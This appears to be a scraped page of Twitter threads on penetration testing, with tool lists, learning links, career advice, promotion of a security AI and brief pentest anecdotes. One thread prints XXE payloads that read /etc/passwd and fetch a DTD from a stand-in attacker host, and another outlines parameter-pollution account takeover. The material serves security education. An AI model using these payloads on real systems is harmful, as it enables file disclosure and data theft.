Discover and read the best of Twitter Threads about #pentesting
Most recents (24)
10 ways to use awk for hackers! 🚀 🧵👇 
1️⃣ Extracting Specific Columns from a CSV File
Quickly extract email addresses and phone numbers from a huge contact list.
#DataExtraction #EthicalHacking
Quickly extract email addresses and phone numbers from a huge contact list.
#DataExtraction #EthicalHacking
2️⃣ Filtering Lines Based on a Pattern
Filter out sensitive information like passwords from log files.
#LogAnalysis #Security
Filter out sensitive information like passwords from log files.
#LogAnalysis #Security
🧵 (1/3) How well do you know your tools? 🔧
We have gathered a list of resources for you to explore and practice the most powerful #pentesting tools.
We have gathered a list of resources for you to explore and practice the most powerful #pentesting tools.
(2/3) 📚 Your next #HTB Academy lessons:
➡️ Explore the #Linux Fundamentals: bit.ly/3HpAAIu
➡️ Learn Network Enumeration with Nmap: bit.ly/44dY2kM
➡️ Metasploit Framework: bit.ly/3GoN68t
➡️ Web Requests: bit.ly/41KqOb3
➡️ Explore the #Linux Fundamentals: bit.ly/3HpAAIu
➡️ Learn Network Enumeration with Nmap: bit.ly/44dY2kM
➡️ Metasploit Framework: bit.ly/3GoN68t
➡️ Web Requests: bit.ly/41KqOb3
(3/3) Don't forget about these #pentesting tools 🫡
➡️ Cracking Passwords with Hashcat: bit.ly/3n9CYvl
➡️ Active Directory BloodHound: bit.ly/3VcoW8P
➡️ Intro to Network Traffic Analysis: bit.ly/3HmHZHU
➡️ Cracking Passwords with Hashcat: bit.ly/3n9CYvl
➡️ Active Directory BloodHound: bit.ly/3VcoW8P
➡️ Intro to Network Traffic Analysis: bit.ly/3HmHZHU
40 Best PenTesting Toolkits
Information Gathering
•OSINT Framework
•Nmap
•Whois
•Recon-ng
•Wireshark
•Dnsrecon
•Google Hacking Database
•Nikto
•Dnsenum
Information Gathering
•OSINT Framework
•Nmap
•Whois
•Recon-ng
•Wireshark
•Dnsrecon
•Google Hacking Database
•Nikto
•Dnsenum
Scanning and Enumeration
•Nmap
•Nikto
•Powershell Scripts
•Openvas
•Nessus
•Sqlninja
•OWASP ZAP
•Wp-scan
•Nmap
•Nikto
•Powershell Scripts
•Openvas
•Nessus
•Sqlninja
•OWASP ZAP
•Wp-scan
Exploitation
•Metasploit
•Sqlmap
•Mitre Att&ck
•Burp Suite
•Hydra
•Netcat
•Routersploit
•Cain and Abel
•John the Ripper
•Hashcat
•Metasploit
•Sqlmap
•Mitre Att&ck
•Burp Suite
•Hydra
•Netcat
•Routersploit
•Cain and Abel
•John the Ripper
•Hashcat
From Noob to Pentesting Clients in 2023 👇
1. Be laser focused to become l33t. Cybersecurity is a large field and you can't be an expert of everything.
2. Let's say you choose application security. Here's how I would skill up really fast.
#cybersecurity #pentesting #hacking #DataSecurity
Cybersecurity is essential for protecting our digital lives. From personal devices to enterprise systems, cyber threats are ever-present and evolving. As technology advances, so do the tactics and techniques of cybercriminals.
Cybersecurity is essential for protecting our digital lives. From personal devices to enterprise systems, cyber threats are ever-present and evolving. As technology advances, so do the tactics and techniques of cybercriminals.
One of the most important steps in securing our digital lives is to use strong, unique passwords. This means avoiding common words and phrases, & instead using a combination of letters, numbers, and symbols. It's also important to avoid reusing passwords across multiple accounts.
Another key aspect of cybersecurity is keeping software up to date. Software companies regularly release updates that include security patches and bug fixes. By keeping your software up to date, you can protect against known vulnerabilities that cybercriminals may exploit.
HTTP Parameter Pollution @SecGPT has seen in its training.
1. ATO via password reset
The attacker manipulates the HTTP parameters of the password reset page to change the email address associated with the account; then use the password reset link => ATO.
The attacker manipulates the HTTP parameters of the password reset page to change the email address associated with the account; then use the password reset link => ATO.
2. Price manipulation in e-commerce platforms
The attacker manipulates the HTTP parameters of an e-commerce website to change the price of a product. The attacker can then purchase the product at a lower price than intended.
The attacker manipulates the HTTP parameters of an e-commerce website to change the price of a product. The attacker can then purchase the product at a lower price than intended.
🚀🔒Exciting news! SecGPT is now LIVE!
Trained on thousands of cybersecurity reports, SecGPT revolutionizes cybersecurity with AI-driven insights.👇
Trained on thousands of cybersecurity reports, SecGPT revolutionizes cybersecurity with AI-driven insights.👇
1. Trained on an extensive collection of cybersecurity reports, @SecGPT provides you with a deeper understanding of vulnerabilities, exploitation techniques, and emerging trends in cybersecurity.
Its knowledge increases as more reports and writeups are published.
Its knowledge increases as more reports and writeups are published.
2. Explore SecGPT's capabilities and see how it can assist you in enhancing your cybersecurity expertise.
Try it out for free at alterai.me
#ai #cybersecurity #infosec #pentesting #ethicalhacking #bugbounty #bugbountytips #secgpt
Try it out for free at alterai.me
#ai #cybersecurity #infosec #pentesting #ethicalhacking #bugbounty #bugbountytips #secgpt
I never rely on automation alone.
In a recent external pentest, I was going over the assets manually, while running some tools in the background, including nuclei.
In a recent external pentest, I was going over the assets manually, while running some tools in the background, including nuclei.
1. One instance was running a software vulnerable to arbitrary file deletion. Nuclei didn't even smell it, unfortunately.
What I usually do, is to look over famous exploits for the specific software. And this one was a victim.
What I usually do, is to look over famous exploits for the specific software. And this one was a victim.
2. Another instance was running a software vulnerable to RCE. Thanks @infosec_au for the amazing work that help uncover this.
Nuclei has some templates for this, but they didn't catch it.
Similar to #1, I dug deeper manually and confirmed the vulnerabilty.
Nuclei has some templates for this, but they didn't catch it.
Similar to #1, I dug deeper manually and confirmed the vulnerabilty.
Boost your pentesting and bug bounty game with SecGPT's AI insights from thousands of online security reports.
I've asked it for some XXE payloads found in the reports.
I've asked it for some XXE payloads found in the reports.
1. Basic XXE payload
`<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>`
`<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>`
2. Blind XXE payload
`<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attackerdomain/xxe.dtd">%xxe;]><foo></foo>`
`<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attackerdomain/xxe.dtd">%xxe;]><foo></foo>`
Unlocking the Secrets: Breaking Access Controls, the basics 👇
(from the AI model I'm currently training on security reports)
(from the AI model I'm currently training on security reports)
1. Direct object reference
This occurs when an attacker is able to access a resource directly by manipulating a parameter in the URL or form data.
This occurs when an attacker is able to access a resource directly by manipulating a parameter in the URL or form data.
2. Horizontal privilege escalation
This occurs when an attacker is able to access resources or perform actions that are intended for another user with the same level of access.
This occurs when an attacker is able to access resources or perform actions that are intended for another user with the same level of access.
Often times to simplify my work I build scripts.👇
I recently discovered katana by @pdiscoveryio. And I turned this:
katana -d 5 -c 50 -p 20 -ef "ttf,woff,svg,jpeg,jpg,png,ico,gif,css" -u <https://tld> -cs "regex-to-restrict-to-tld-and-subdomains"
into this:
kata <tld>
I recently discovered katana by @pdiscoveryio. And I turned this:
katana -d 5 -c 50 -p 20 -ef "ttf,woff,svg,jpeg,jpg,png,ico,gif,css" -u <https://tld> -cs "regex-to-restrict-to-tld-and-subdomains"
into this:
kata <tld>
1. The long command does the following:
-d => depth 5
-c => concurrency 50
-p => threads in parallel 20
-ef => exclude these
-u => supply the top level domain (i.e. twitter.com)
-cs => scope for this regex (limited to the tld and its subdomains)
-d => depth 5
-c => concurrency 50
-p => threads in parallel 20
-ef => exclude these
-u => supply the top level domain (i.e. twitter.com)
-cs => scope for this regex (limited to the tld and its subdomains)
2. You can download the kata bash script from my repo below. Use it as:
kata <tld>
Do me a favor and star the repo, thanks!
#pentesting #infosec #cybersecurity #ethicalhacking #bugbounty #bugbountytips
github.com/CristiVlad25/s…
kata <tld>
Do me a favor and star the repo, thanks!
#pentesting #infosec #cybersecurity #ethicalhacking #bugbounty #bugbountytips
github.com/CristiVlad25/s…
As much as I love automation in recon, 98% of the findings in my pentests have nothing to do with it. Why? 👇
1. Inspired by @NahamSec recent video.
First, in a large majority of the web pentests, clients want me to focus only on their app and it's features. So, there's no need for subdomain enumeration/bruteforcing or any other large recon tactic.
First, in a large majority of the web pentests, clients want me to focus only on their app and it's features. So, there's no need for subdomain enumeration/bruteforcing or any other large recon tactic.
2. This doesn't mean that I don't use automation. I automate some of the boring and repetitive tasks via bash and python.
More practice, less theory (but not 0 theory)
In the past, I criticized Top 1% THM who know close to nothing about the real-world aspects of a pentest.
My point was not understood and I got a lot of hate for it.
In the past, I criticized Top 1% THM who know close to nothing about the real-world aspects of a pentest.
My point was not understood and I got a lot of hate for it.
1. Again, there's less value in being Top 1% if your experience is purely theoretical.
Yet, you will go way further if you complement your experience (from day-to-day work in cybersecurity) with continuous practice on THM and other platforms (focusing on non-CTFish materials).
Yet, you will go way further if you complement your experience (from day-to-day work in cybersecurity) with continuous practice on THM and other platforms (focusing on non-CTFish materials).
2. If you're not working in cybersecurity yet, but you want to, no problem.
Get your daily real-world experience from VDPs (and not paid bounties).
Get your daily real-world experience from VDPs (and not paid bounties).
Grow your cybersecurity skills with this incredible collection of FREE learning resources.
⚡️ Get ready to level up!
Follow & share the 🧵
#infosec #cybersecurity #pentesting #bugbounty
#hacking #blueteam #redteam #technology #DataSecurity #CyberSec #Linux#soc #dfir
⚡️ Get ready to level up!
Follow & share the 🧵
#infosec #cybersecurity #pentesting #bugbounty
#hacking #blueteam #redteam #technology #DataSecurity #CyberSec #Linux#soc #dfir
Looking to kickstart your career in cybersecurity?
You can do it all with FREE resources and a clear step-by-step path
Here is How 🧵
#infosec #cybersecurity #pentesting #oscp @tryhackme #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Linux
You can do it all with FREE resources and a clear step-by-step path
Here is How 🧵
#infosec #cybersecurity #pentesting #oscp @tryhackme #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Linux
1️⃣ Level - Introduction to OpenVPN
🅰️ OpenVPN: How to Connect
-OpenVPN - Windows
-OpenVPN - Linux
-OpenVPN - MacOS
The room is free complete it.👇
tryhackme.com/room/openvpn
🅰️ OpenVPN: How to Connect
-OpenVPN - Windows
-OpenVPN - Linux
-OpenVPN - MacOS
The room is free complete it.👇
tryhackme.com/room/openvpn
2️⃣ Introductory Research Walkthrough
Here you will learn
- How to research
- How to search for vulnerabilities
The room is free complete it.👇
tryhackme.com/room/introtore…
Here you will learn
- How to research
- How to search for vulnerabilities
The room is free complete it.👇
tryhackme.com/room/introtore…
1. Subscribe to my free newsletter. At cristivlad.substack.com.
2. Like and retweet this post (the top post of the thread).
Collection of RCE write-ups. thanks to all researchers for sharing there findings.
link.medium.com/MyvJZn2E5wb
github.com/httpvoid/write…
link.medium.com/3ZDBao5E5wb
link.medium.com/QJ9Jjt8E5wb
infosecwriteups.com/how-i-found-my… #bugbountytip #bugbountytips #RCE #cybersecurity #Pentesting #writeup
link.medium.com/MyvJZn2E5wb
github.com/httpvoid/write…
link.medium.com/3ZDBao5E5wb
link.medium.com/QJ9Jjt8E5wb
infosecwriteups.com/how-i-found-my… #bugbountytip #bugbountytips #RCE #cybersecurity #Pentesting #writeup
SSRF via PDF? Now made easy.
(thread)
(thread)
1. Go to @jonasl github and clone this repo. Can't paste the link, for some reason @twitter thinks it's malicious...
2. Copy Burp Collaborator URL to the clipboard.
Privilege escalation in Windows using 4 tools for red teamers and pentesters.
(thread)
(thread)
1. WinPEAS - it's a simple .exe script you can run as: winpeas.exe > outputfile.txt
Get it here: github.com/carlospolop/PE…
Get it here: github.com/carlospolop/PE…
In this week's newsletter:
- building the next ChatGPT | Network Pentesting | Full-blown Winter -
(thread)
- building the next ChatGPT | Network Pentesting | Full-blown Winter -
(thread)
1. I'm talking about the 6 month learning plan to understand AI large language models from scratch - the stuff that #chatGPT is built on.
2. I'm also talking about the heavy workload of pentests and appsec assessments from this past week.
Top Python Libraries used by Hackers
(thread)
(thread)
1. socket: A library that provides low-level core networking services.
2. scapy: A powerful interactive packet manipulation library and tool.
Look for these file extensions in your pentests and appsec assessments.
(thread)
(thread)
1. .env - commonly used to store environment variables, including sensitive information such as passwords and tokens.
2. .yml/.yaml - commonly used in configuration files for software written in programming languages like Ruby, Python and JavaScript.
In this week's newsletter:
- iOS Pentesting | ChatGPT my Teacher | Recon -
(thread)
- iOS Pentesting | ChatGPT my Teacher | Recon -
(thread)
1. How I'm using ChatGPT as a virtual teacher. And of course, how you can use it too.
2. My greatest pentesting challenge for this week.
Squeezing the juices out of robots.txt.
A fully automated workflow that you've never seen before.
(thread)
A fully automated workflow that you've never seen before.
(thread)
1. This script scrapes the disallowed paths from the robots.txt files of a list of domains and saves them to a single file. It also removes any unwanted entries and sorts the file in a particular way.
Can you write it yourself? Here’s how the script should look like.
Can you write it yourself? Here’s how the script should look like.
2. Create a directory called "massrobots" in the pwd. This is where you'll save all the robots.txt files for later processing.
